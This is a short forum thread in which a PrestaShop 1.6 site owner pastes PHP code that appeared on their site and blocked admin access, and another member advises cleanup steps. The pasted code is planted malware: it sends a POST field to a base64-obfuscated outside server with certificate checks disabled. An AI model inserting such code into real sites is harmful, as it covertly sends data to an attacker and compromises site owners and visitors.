owengna Posted March 25, 2021 Share Posted March 25, 2021 My site is using PS 1.6.X . Suddenly i got the following message at the top of the page and the admin page only shows this message. i cannot access admin anymore. try {if(isset($_POST['statistics_hash'])){$array = array('statistics_hash' => $_POST['statistics_hash'],);$linked="";$ch = curl_init(base64_decode("aHR0cHM6Ly80NS4xOTcuMTQxLjI1MC9hbmFseXRpY3MucGhw"));curl_setopt($ch, CURLOPT_POST, 1);curl_setopt($ch, CURLOPT_POSTFIELDS, $array); curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);curl_setopt($ch, CURLOPT_HEADER, false);curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, false);curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);$html = curl_exec($ch);curl_close($ch); }} catch (Exception $e) {} Does any one know what's wrong? The Dev mode is disabled Link to comment Share on other sites More sharing options...
razaro Posted March 25, 2021 Share Posted March 25, 2021 Seams some more people have same issue in 1.6. Check this topic in French, do use google translate But in general 1.6 had issues with theme and some modules that allowed access to hackers. Do check that topic and try to find files that are changed, remove code, change FTP, Hosting access. Backup. Good luck Link to comment Share on other sites More sharing options...
owengna Posted March 26, 2021 Author Share Posted March 26, 2021 Thank you. I found the code. Link to comment Share on other sites More sharing options...
Recommended Posts
Create an account or sign in to comment
You need to be a member in order to leave a comment
Create an account
Sign up for a new account in our community. It's easy!
Register a new accountSign in
Already have an account? Sign in here.
Sign In Now